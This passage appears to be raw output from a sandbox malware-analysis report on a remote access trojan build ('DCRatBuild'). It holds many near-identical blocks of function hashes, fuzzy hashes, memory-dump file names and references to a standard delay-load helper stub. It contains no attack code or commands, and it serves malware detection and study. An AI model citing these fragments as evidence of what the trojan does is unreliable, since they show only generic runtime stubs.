                                  • Instruction ID: ed0b7d01d0ddc0ceed7a73bbfcd15236c6fe4fe507712e7edc6647fb71efc084
                                  • Opcode Fuzzy Hash: 8bacc2c903961316ba569b38cccee6efe9814ffce20610989eefcdb92207a8ae
                                  • Instruction Fuzzy Hash: 55A001E66AD697BC7108A256AD66D3A421CE8C6B69730892AB44AE41C1A9806C4D5832
                                  APIs
                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008ED8A3
                                    • Part of subcall function 008EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008EDFD6
                                    • Part of subcall function 008EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008EDFE7
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                  • String ID:
                                  • API String ID: 1269201914-0
                                  • Opcode ID: 7afcf60be1db2e6244a9a8af344c8386d40d16d0a7e2dc42b80c1dbc2e32981c
                                  • Instruction ID: ed0b7d01d0ddc0ceed7a73bbfcd15236c6fe4fe507712e7edc6647fb71efc084
                                  • Opcode Fuzzy Hash: 7afcf60be1db2e6244a9a8af344c8386d40d16d0a7e2dc42b80c1dbc2e32981c
                                  • Instruction Fuzzy Hash: 55A001E66AD697BC7108A256AD66D3A421CE8C6B69730892AB44AE41C1A9806C4D5832
                                  APIs
                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008ED8A3
                                    • Part of subcall function 008EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008EDFD6
                                    • Part of subcall function 008EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008EDFE7
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                  • String ID:
                                  • API String ID: 1269201914-0
                                  • Opcode ID: 51db815c5a2b484cc703ba86aaba315e5681b8ca453799975824514f74c76d01
                                  • Instruction ID: ed0b7d01d0ddc0ceed7a73bbfcd15236c6fe4fe507712e7edc6647fb71efc084
                                  • Opcode Fuzzy Hash: 51db815c5a2b484cc703ba86aaba315e5681b8ca453799975824514f74c76d01
                                  • Instruction Fuzzy Hash: 55A001E66AD697BC7108A256AD66D3A421CE8C6B69730892AB44AE41C1A9806C4D5832
                                  APIs
                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008ED8A3
                                    • Part of subcall function 008EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008EDFD6
                                    • Part of subcall function 008EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008EDFE7
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                  • String ID:
                                  • API String ID: 1269201914-0
                                  • Opcode ID: 6a7154c2677db024c451af3a44d46258a6a15c469cfed6f54ec2168021bdf9c1
                                  • Instruction ID: ed0b7d01d0ddc0ceed7a73bbfcd15236c6fe4fe507712e7edc6647fb71efc084
                                  • Opcode Fuzzy Hash: 6a7154c2677db024c451af3a44d46258a6a15c469cfed6f54ec2168021bdf9c1
                                  • Instruction Fuzzy Hash: 55A001E66AD697BC7108A256AD66D3A421CE8C6B69730892AB44AE41C1A9806C4D5832
                                  APIs
                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008ED8A3
                                    • Part of subcall function 008EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008EDFD6
                                    • Part of subcall function 008EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008EDFE7
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                  • String ID:
                                  • API String ID: 1269201914-0
                                  • Opcode ID: 82769350b79562ecda4b17028b44e489e0ea8fe4c074f6da398a2b7633faa60c
                                  • Instruction ID: ed0b7d01d0ddc0ceed7a73bbfcd15236c6fe4fe507712e7edc6647fb71efc084
                                  • Opcode Fuzzy Hash: 82769350b79562ecda4b17028b44e489e0ea8fe4c074f6da398a2b7633faa60c
                                  • Instruction Fuzzy Hash: 55A001E66AD697BC7108A256AD66D3A421CE8C6B69730892AB44AE41C1A9806C4D5832
                                  APIs
                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008ED8A3
                                    • Part of subcall function 008EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008EDFD6
                                    • Part of subcall function 008EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008EDFE7
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                  • String ID:
                                  • API String ID: 1269201914-0
                                  • Opcode ID: b0368143de36281fba16b5a0cf7acfca81e6678134de2b34592b3074cce3ca9c
                                  • Instruction ID: ed0b7d01d0ddc0ceed7a73bbfcd15236c6fe4fe507712e7edc6647fb71efc084
                                  • Opcode Fuzzy Hash: b0368143de36281fba16b5a0cf7acfca81e6678134de2b34592b3074cce3ca9c
                                  • Instruction Fuzzy Hash: 55A001E66AD697BC7108A256AD66D3A421CE8C6B69730892AB44AE41C1A9806C4D5832
                                  APIs
                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008ED8A3
                                    • Part of subcall function 008EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008EDFD6
                                    • Part of subcall function 008EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008EDFE7
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                  • String ID:
                                  • API String ID: 1269201914-0
                                  • Opcode ID: 5d10d15ba3f85ce6492e2468f907143f288af14b9db79c4886f78fd5d3616d74
                                  • Instruction ID: ed0b7d01d0ddc0ceed7a73bbfcd15236c6fe4fe507712e7edc6647fb71efc084
                                  • Opcode Fuzzy Hash: 5d10d15ba3f85ce6492e2468f907143f288af14b9db79c4886f78fd5d3616d74
                                  • Instruction Fuzzy Hash: 55A001E66AD697BC7108A256AD66D3A421CE8C6B69730892AB44AE41C1A9806C4D5832
                                  APIs
                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008ED8A3
                                    • Part of subcall function 008EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008EDFD6
                                    • Part of subcall function 008EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008EDFE7
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                  • String ID:
                                  • API String ID: 1269201914-0
                                  • Opcode ID: e0ed7d8f1dcec9770b8c935678554eef5743264fc3fdf2e1ecd70947f6e95e86
                                  • Instruction ID: ed0b7d01d0ddc0ceed7a73bbfcd15236c6fe4fe507712e7edc6647fb71efc084
                                  • Opcode Fuzzy Hash: e0ed7d8f1dcec9770b8c935678554eef5743264fc3fdf2e1ecd70947f6e95e86
                                  • Instruction Fuzzy Hash: 55A001E66AD697BC7108A256AD66D3A421CE8C6B69730892AB44AE41C1A9806C4D5832
                                  APIs
                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008ED8A3
                                    • Part of subcall function 008EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008EDFD6
                                    • Part of subcall function 008EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008EDFE7
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                  • String ID:
                                  • API String ID: 1269201914-0
                                  • Opcode ID: 92cd79dafdb1d29a406aaf75d9463d5aab8be01c5e9e642b71b835cafa31800b
                                  • Instruction ID: ed0b7d01d0ddc0ceed7a73bbfcd15236c6fe4fe507712e7edc6647fb71efc084
                                  • Opcode Fuzzy Hash: 92cd79dafdb1d29a406aaf75d9463d5aab8be01c5e9e642b71b835cafa31800b
                                  • Instruction Fuzzy Hash: 55A001E66AD697BC7108A256AD66D3A421CE8C6B69730892AB44AE41C1A9806C4D5832
                                  APIs
                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008ED8A3
                                    • Part of subcall function 008EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008EDFD6
                                    • Part of subcall function 008EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008EDFE7
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                  • String ID:
                                  • API String ID: 1269201914-0
                                  • Opcode ID: 03a17c551dc40b7efb1dc24c43b2750f8c056e143a4d59973566fc42a7c9411e
                                  • Instruction ID: ed0b7d01d0ddc0ceed7a73bbfcd15236c6fe4fe507712e7edc6647fb71efc084
                                  • Opcode Fuzzy Hash: 03a17c551dc40b7efb1dc24c43b2750f8c056e143a4d59973566fc42a7c9411e
                                  • Instruction Fuzzy Hash: 55A001E66AD697BC7108A256AD66D3A421CE8C6B69730892AB44AE41C1A9806C4D5832
                                  APIs
                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008EDAB2
                                    • Part of subcall function 008EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008EDFD6
                                    • Part of subcall function 008EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008EDFE7
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                  • String ID:
                                  • API String ID: 1269201914-0
                                  • Opcode ID: 14b6aa1b4f29e218c02fb533bdef6c56bb879820a28843fb3c56e554d718fc94
                                  • Instruction ID: c8702a40c6723faa27ef51bc1aa5091dec937d8e7af0906b994204040897a474
                                  • Opcode Fuzzy Hash: 14b6aa1b4f29e218c02fb533bdef6c56bb879820a28843fb3c56e554d718fc94
                                  • Instruction Fuzzy Hash: A1A011E22AC282BC3008B203AC02C3A020CE0C2B2A330822AF00AE00C8A8808C0C0832
                                  APIs
                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008EDAB2
                                    • Part of subcall function 008EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008EDFD6
                                    • Part of subcall function 008EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008EDFE7
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                  • String ID:
                                  • API String ID: 1269201914-0
                                  • Opcode ID: 71064167ca3a2d418197b6681e2060e6fc4e3961e62a9570372cffba57e4065f
                                  • Instruction ID: 4111161169764c2b711601b15ca92be2b3eb061f8449e743ca69dc4bb60d2430
                                  • Opcode Fuzzy Hash: 71064167ca3a2d418197b6681e2060e6fc4e3961e62a9570372cffba57e4065f
                                  • Instruction Fuzzy Hash: 45A011E22AC282BC3008B203AC02C3A020CE0C2BA83308A2AF00AC00C8A8808C0C0832
                                  APIs
                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008EDAB2
                                    • Part of subcall function 008EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008EDFD6
                                    • Part of subcall function 008EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008EDFE7
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                  • String ID:
                                  • API String ID: 1269201914-0
                                  • Opcode ID: 3484c96872875247f592db10aa4d1c79fad1abb93bd456ba26f991eb52d439ee
                                  • Instruction ID: 4111161169764c2b711601b15ca92be2b3eb061f8449e743ca69dc4bb60d2430
                                  • Opcode Fuzzy Hash: 3484c96872875247f592db10aa4d1c79fad1abb93bd456ba26f991eb52d439ee
                                  • Instruction Fuzzy Hash: 45A011E22AC282BC3008B203AC02C3A020CE0C2BA83308A2AF00AC00C8A8808C0C0832
                                  APIs
                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008EDAB2
                                    • Part of subcall function 008EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008EDFD6
                                    • Part of subcall function 008EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008EDFE7
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                  • String ID:
                                  • API String ID: 1269201914-0
                                  • Opcode ID: 63fee5e7b90736dd38fb66a7f68f47928a2cac4db44b5c63342cfb79321a8324
                                  • Instruction ID: 4111161169764c2b711601b15ca92be2b3eb061f8449e743ca69dc4bb60d2430
                                  • Opcode Fuzzy Hash: 63fee5e7b90736dd38fb66a7f68f47928a2cac4db44b5c63342cfb79321a8324
                                  • Instruction Fuzzy Hash: 45A011E22AC282BC3008B203AC02C3A020CE0C2BA83308A2AF00AC00C8A8808C0C0832
                                  APIs
                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008EDAB2
                                    • Part of subcall function 008EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008EDFD6
                                    • Part of subcall function 008EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008EDFE7
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                  • String ID:
                                  • API String ID: 1269201914-0
                                  • Opcode ID: 9992605887685d3ebaed1ed95d5ffedd630525573d2bb6d3c50d90747f3b29d3
                                  • Instruction ID: 4111161169764c2b711601b15ca92be2b3eb061f8449e743ca69dc4bb60d2430
                                  • Opcode Fuzzy Hash: 9992605887685d3ebaed1ed95d5ffedd630525573d2bb6d3c50d90747f3b29d3
                                  • Instruction Fuzzy Hash: 45A011E22AC282BC3008B203AC02C3A020CE0C2BA83308A2AF00AC00C8A8808C0C0832
                                  APIs
                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008EDAB2
                                    • Part of subcall function 008EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008EDFD6
                                    • Part of subcall function 008EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008EDFE7
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                  • String ID:
                                  • API String ID: 1269201914-0
                                  • Opcode ID: a03ecaacaff24429f45a5d793c0b2e5b02dcd6da2a742fbbb0064cb8c24cf824
                                  • Instruction ID: 4111161169764c2b711601b15ca92be2b3eb061f8449e743ca69dc4bb60d2430
                                  • Opcode Fuzzy Hash: a03ecaacaff24429f45a5d793c0b2e5b02dcd6da2a742fbbb0064cb8c24cf824
                                  • Instruction Fuzzy Hash: 45A011E22AC282BC3008B203AC02C3A020CE0C2BA83308A2AF00AC00C8A8808C0C0832
                                  APIs
                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008EDBD5
                                    • Part of subcall function 008EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008EDFD6
                                    • Part of subcall function 008EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008EDFE7
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                  • String ID:
